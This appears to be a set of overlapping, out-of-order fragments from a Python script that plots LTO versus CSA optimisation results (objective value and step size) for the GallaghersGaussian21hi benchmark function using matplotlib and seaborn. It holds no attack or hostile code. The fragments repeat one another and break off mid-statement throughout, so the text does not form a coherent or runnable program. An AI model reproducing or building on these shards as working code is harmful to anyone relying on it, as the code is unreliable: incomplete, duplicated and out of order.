[ "True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5", "alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\",", "len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\"", "data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs", "type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\",", "costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)),", "fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5),", "CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\"", "9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':'", "3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1", "len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs", "1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]),", "args.function popsize = 10 data_LTO = {} data_CSA = {} with open(lto_path) as", "1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1)", "np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) +", "= 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] =", "plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen *", "plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend()", "np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1,", "rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path):", "datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family']", "LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path',", "timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))", "1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp =", "import seaborn as sns import matplotlib.pyplot as plt import argparse from datetime import", "= datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path,", "rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon']", "import argparse from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] =", "numpy as np import seaborn as sns import matplotlib.pyplot as plt import argparse", "parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to", "1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1", "plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma", "= 32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not", "plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10)", "argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script", "Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in", "\"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function,", "1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1)", "json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations *", "generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\",", "len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs", "costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"])", "default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path", "= json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x',", "linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp)", "32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s", "data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"])", "rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize']", "= generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step", "import json import numpy as np import seaborn as sns import matplotlib.pyplot as", "costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"],", "= 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] =", "LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\"))", "Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\",", "popsize = 10 data_LTO = {} data_CSA = {} with open(lto_path) as json_file:", "= 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] =", "plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\",", "type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time =", "which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5),", "exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function,", "LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"])", "costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time", "rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width']", "if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to", "= 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] =", "'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30", "CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time =", "plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations,", "+ 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma", "= 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] =", "for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average", "label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma", "linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std", "os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' %", "LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]),", "len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) +", "= True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] =", "('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25,", "6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32", "plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1,", "matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize']", "bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50)", "with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA =", "is not a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to", "parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the", "data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize", "costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs", "np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std", "return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"%", "data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average", "color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"])", "(type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num", "fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for", "data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path,", "seaborn as sns import matplotlib.pyplot as plt import argparse from datetime import datetime", "[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function)", "32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32", "import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False", "dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path", "file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path =", "args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize", "plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations,", "as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations", "= ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0,", "10 data_LTO = {} data_CSA = {} with open(lto_path) as json_file: data_LTO =", "32 def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a", "1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6", "plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"])", "LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma", "def dir_path(path): if os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid", "json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations =", "= \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp)", "not a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot", "':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both'", "default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function", "costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs", "plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\")", "color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"])", "as np import seaborn as sns import matplotlib.pyplot as plt import argparse from", "= 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else: raise", "stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])", "CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average", "1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)),", "data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4,", "as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations", "plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type =", "popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1,", "costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"],", "plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average", "default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function", "= args.lto_path csa_path = args.csa_path function = args.function popsize = 10 data_LTO =", "costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type =", "6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6", "= str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf()", "data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average", "plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\"))", "plt import argparse from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"]", "'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3", "= os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf'", "+ 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) +", "= {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file:", "32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32", "= argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO", "* popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50)", "gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma", "import numpy as np import seaborn as sns import matplotlib.pyplot as plt import", "help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\")", "rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth']", "CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)),", "for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)),", "label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file", "color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file =", "from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex']", "= 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] =", "step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]),", "args.csa_path function = args.function popsize = 10 data_LTO = {} data_CSA = {}", "LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)),", "LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std", "path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.')", "= 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] =", "plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen", "file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str,", "raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a file\"% path) parser =", "type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path =", "test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path,", "argparse from datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\"", "rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which']", "plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10,", "rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0)", "1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path", "output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file =", "from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif'", "alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\",", "data_LTO = {} data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file)", "= 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] =", "= ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] =", "costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs", "rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 